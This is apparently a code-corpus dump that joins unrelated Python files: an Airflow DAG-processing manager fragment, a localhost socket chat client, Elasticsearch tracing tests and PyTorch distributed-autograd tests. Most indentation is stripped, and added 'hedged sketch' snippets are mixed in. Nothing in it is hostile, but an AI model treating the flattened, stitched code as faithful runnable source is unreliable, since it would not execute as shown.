)
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((timezone.utcnow() - processor_start_time).total_seconds()
if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (timezone.utcnow() - last_run).total_seconds()
Stats.gauge(
'dag_processing.last_run.seconds_ago.{}'.format(file_name),
seconds_ago
)
rows.append((file_path,
processor_pid,
runtime,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime)
if runtime else None,
"{:.2f}s".format(last_runtime)
if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S")
if last_run else None))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
@property
def file_paths(self):
return self._file_paths
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_runtime(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the current runtime (in seconds) of the process that's
processing the specified file or None if the file is not currently
being processed
"""
if file_path in self._processors:
return (timezone.utcnow() - self._processors[file_path].start_time)\
.total_seconds()
return None
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
return self._last_runtime.get(file_path)
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
return self._last_finish_time.get(file_path)
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
processor.terminate()
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
running_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
now = timezone.utcnow()
finished_processors[file_path] = processor
self._last_runtime[file_path] = (now -
processor.start_time).total_seconds()
self._last_finish_time[file_path] = now
self._run_count[file_path] += 1
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.warning(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if len(self._file_path_queue) == 0:
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, num_runs in self._run_count.items()
if num_runs == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while (self._parallelism - len(self._processors) > 0 and
len(self._file_path_queue) > 0):
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path)
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._run_count[self._heart_beat_key] += 1
return simple_dags
def _kill_timed_out_processors(self):
"""
Kill any file processors that have timed out, to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.info(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
processor.file_path, processor.pid, processor.start_time.isoformat())
Stats.incr('dag_file_processor_timeouts', 1, 1)
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for file_path in self._file_paths:
if self._run_count[file_path] < self._max_runs:
return False
if self._run_count[self._heart_beat_key] < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphans.
"""
pids_to_kill = self.get_all_pids()
if len(pids_to_kill) > 0:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if len(child_processes) > 0:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
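# Hedged sketch (not part of the original source): wiring a
# DagFileProcessorManager to a parent process over a multiprocessing Pipe,
# mirroring what DagFileProcessorAgent._run_processor_manager does in a
# subprocess. `processor_factory` is a hypothetical stand-in.
def _example_run_manager(dag_directory, file_paths, processor_factory):
    from datetime import timedelta
    parent_conn, child_conn = multiprocessing.Pipe()
    manager = DagFileProcessorManager(dag_directory=dag_directory,
                                      file_paths=file_paths,
                                      max_runs=1,
                                      processor_factory=processor_factory,
                                      processor_timeout=timedelta(minutes=5),
                                      signal_conn=child_conn,
                                      async_mode=True)
    manager.start()  # runs the parsing loop until max_runs is reached
    # While the loop runs, the parent end of the pipe receives SimpleDag
    # results followed by DagParsingStat messages.
    return parent_conn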
|
cl_4.py
|
import socket
import time
from threading import Thread
import sys
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect(("127.0.0.1", 14903))
def receive():
while True:
data = conn.recv(16384)
udata = data.decode("utf-8")
if not data:
break
print(udata)
def send_mes():
while True:
message = input()
if message:
conn.send(bytes(message, "utf-8"))
if message == "quit":
sys.exit()
break
receive_thread = Thread(target=receive)
send_thread = Thread(target=send_mes)
receive_thread.start()
send_thread.start()
send_thread.join()
receive_thread.join()
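# Hedged companion sketch (not part of cl_4.py): a minimal single-client echo
# server so the client above has something to connect to on 127.0.0.1:14903
# during local testing. It reuses the socket import at the top of this file.
def run_echo_server(host="127.0.0.1", port=14903):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    client, _addr = srv.accept()
    while True:
        data = client.recv(16384)
        if not data or data == b"quit":
            break
        client.send(data)  # echo the UTF-8 payload back unchanged
    client.close()
    srv.close()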
|
test_lowlevel.py
|
import datetime
import unittest
import threading
import time
from elasticsearch import Elasticsearch
from elasticsearch_opentracing import TracingTransport, init_tracing, \
enable_tracing, disable_tracing, set_active_span, clear_active_span, \
get_active_span, _clear_tracing_state
from mock import patch
from .dummies import *
@patch('elasticsearch.Transport.perform_request')
class TestTracing(unittest.TestCase):
def setUp(self):
self.tracer = DummyTracer()
self.es = Elasticsearch(transport_class=TracingTransport)
def tearDown(self):
_clear_tracing_state()
def test_tracing(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False, prefix='Prod007')
mock_perform_req.return_value = {'hits': []}
main_span = DummySpan()
set_active_span(main_span)
enable_tracing()
body = {"any": "data", "timestamp": datetime.datetime.now()}
res = self.es.index(index='test-index', doc_type='tweet', id=1,
body=body, params={'refresh': True})
self.assertEqual(mock_perform_req.return_value, res)
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(self.tracer.spans[0].operation_name, 'Prod007/test-index/tweet/1')
self.assertEqual(self.tracer.spans[0].is_finished, True)
self.assertEqual(self.tracer.spans[0].child_of, main_span)
self.assertEqual(self.tracer.spans[0].tags, {
'component': 'elasticsearch-py',
'db.type': 'elasticsearch',
'db.statement': body,
'span.kind': 'client',
'elasticsearch.url': '/test-index/tweet/1',
'elasticsearch.method': 'PUT',
'elasticsearch.params': {'refresh': True},
})
def test_trace_none(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
set_active_span(DummySpan())
self.es.get(index='test-index', doc_type='tweet', id=3)
self.assertEqual(0, len(self.tracer.spans))
def test_trace_all_requests(self, mock_perform_req):
init_tracing(self.tracer)
for i in range(3):
self.es.get(index='test-index', doc_type='tweet', id=i)
self.assertEqual(3, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
enable_tracing()
disable_tracing() # Shouldn't prevent further tracing
self.es.get(index='test-index', doc_type='tweet', id=4)
self.assertEqual(4, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
self.assertTrue(all(map(lambda x: x.child_of is None, self.tracer.spans)))
def test_trace_all_requests_span(self, mock_perform_req):
init_tracing(self.tracer)
main_span = DummySpan()
set_active_span(main_span)
for i in range(3):
self.es.get(index='test-index', doc_type='tweet', id=i)
self.assertEqual(3, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
self.assertTrue(all(map(lambda x: x.child_of == main_span, self.tracer.spans)))
def test_trace_bool_payload(self, mock_perform_req):
init_tracing(self.tracer)
# Some operations, such as creating an index, return a bool value.
mock_perform_req.return_value = False
mapping = "{'properties': {'body': {}}}"
res = self.es.indices.create('test-index', body=mapping)
self.assertFalse(res)
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(self.tracer.spans[0].is_finished, True)
def test_trace_result_tags(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
mock_perform_req.return_value = {
'found': False,
'timed_out': True,
'took': 7
}
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(1, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
self.assertEqual('False', self.tracer.spans[0].tags['elasticsearch.found'])
self.assertEqual('True', self.tracer.spans[0].tags['elasticsearch.timed_out'])
self.assertEqual('7', self.tracer.spans[0].tags['elasticsearch.took'])
def test_disable_tracing(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
disable_tracing()
self.assertEqual(0, len(self.tracer.spans))
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(0, len(self.tracer.spans))
disable_tracing() # shouldn't cause a problem
def test_disable_tracing_span(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
main_span = DummySpan()
set_active_span(main_span)
# Make sure the active span was preserved
enable_tracing()
disable_tracing()
self.assertEqual(main_span, get_active_span())
# Make sure it was preserved, by doing a traced request.
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(main_span, self.tracer.spans[0].child_of)
def test_clear_span(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
set_active_span(DummySpan())
clear_active_span()
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(None, self.tracer.spans[0].child_of)
def test_trace_error(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
main_span = DummySpan()
set_active_span(main_span)
enable_tracing()
mock_perform_req.side_effect = RuntimeError()
try:
self.es.get(index='test-index', doc_type='tweet', id=1)
except RuntimeError as exc:
caught_exc = exc
self.assertEqual(1, len(self.tracer.spans))
self.assertEqual(True, self.tracer.spans[0].is_finished)
self.assertEqual(main_span, self.tracer.spans[0].child_of)
self.assertEqual('true', self.tracer.spans[0].tags['error'])
self.assertEqual(caught_exc, self.tracer.spans[0].tags['error.object'])
def test_trace_after_error(self, mock_perform_req):
init_tracing(self.tracer, trace_all_requests=False)
enable_tracing()
mock_perform_req.side_effect = RuntimeError()
try:
self.es.get(index='test-index', doc_type='tweet', id=1)
except RuntimeError as exc:
pass
self.tracer.clear()
# Should not cause any further tracing
mock_perform_req.side_effect = None
self.es.get(index='test-index', doc_type='tweet', id=1)
self.assertEqual(0, len(self.tracer.spans))
def test_multithreading(self, mock_perform_req):
init_tracing(self.tracer)
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, making thread-1 wait before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1():
set_active_span(DummySpan())
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=1)
ev.set()
ev.wait()
disable_tracing()
def target2():
ev.wait()
enable_tracing()
self.es.get(index='test-index', doc_type='tweet', id=2)
ev.set()
disable_tracing()
t1 = threading.Thread(target=target1)
t2 = threading.Thread(target=target2)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(2, len(self.tracer.spans))
self.assertTrue(all(map(lambda x: x.is_finished, self.tracer.spans)))
self.assertEqual([False, True], list(map(lambda x: x.child_of is None, self.tracer.spans)))
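# Hedged, non-test sketch of how the APIs exercised above might be used in
# application code: install the tracing transport, mark a parent span, and
# trace a single request. `some_tracer` stands in for a real OpenTracing
# tracer instance.
def _example_traced_query(some_tracer, parent_span):
    init_tracing(some_tracer, trace_all_requests=False, prefix='MyApp')
    es = Elasticsearch(transport_class=TracingTransport)
    set_active_span(parent_span)
    enable_tracing()
    try:
        return es.get(index='test-index', doc_type='tweet', id=1)
    finally:
        disable_tracing()
        clear_active_span()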
|
dist_autograd_test.py
|
import sys
import threading
import time
import unittest
from enum import Enum
import random
import torch
import torch.nn as nn
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.distributed.rpc import RRef
from torch.testing._internal.common_utils import IS_MACOS
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent whether the rpc is done on the previous
# rank, and the context id sent from that rank, respectively.
# rpc_done[2] and ctx_ids[2] cover the rank two hops back.
# rpc_done[3] and ctx_ids[3] cover the rank three hops back.
# rpc_done[0] and ctx_ids[0] cover the current rank, but are mostly unused.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals to the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor() -> torch.Tensor:
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1: RRef[torch.Tensor], t2: torch.Tensor) -> torch.Tensor:
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# After a dist autograd context is cleaned up locally, it should also be
# cleaned up on the other nodes. This helper allows timeout_seconds for those
# RPCs to complete, and checks that all the contexts have been cleaned up in
# that timeframe.
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dist autograd context, runs rpc_sync on the given ps,
# and then blocks until the ps has verified that the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except that rpc calls the TorchScript
# function "my_script_ref_add" instead of the python function "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
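# Hedged sketch (not part of the original test helpers): the core
# dist_autograd pattern that the helpers above rely on, assuming RPC has
# already been initialized for this worker and `dst` names a peer worker.
def _example_dist_autograd_step(dst):
    t1 = torch.ones(3, 3, requires_grad=True)
    t2 = torch.zeros(3, 3, requires_grad=True)
    with dist_autograd.context() as context_id:
        loss = rpc.rpc_sync(dst, torch.add, args=(t1, t2)).sum()
        dist_autograd.backward(context_id, [loss])
        # Gradients live in the context, not in t1.grad / t2.grad.
        grads = dist_autograd.get_gradients(context_id)
        return grads[t1], grads[t2]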
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
# Common utils for both CPU and CUDA test suites
class CommonDistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
class DistAutogradTest(CommonDistAutogradTest):
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
# For this context in this rank, it expects graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, forwards t1 and t2 tensors using
# nested rpc call to next dst. In return route, receive result tensor t3
# from next dst and forwarding t3 back to previous calls.
# For this context in this rank, it expects graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
# For the send function created when making the nested rpc call,
# the next functions of the send function are the two recv functions
# for the two tensors received from the previous call
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For the send function created when returning the response to the previous call,
# the next function of the send function is the recv function
# for the result tensor returned from the nested call
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
# For self.rank, it has 4 graphs to verify
# One is for current context id when this rank send first rpc call.
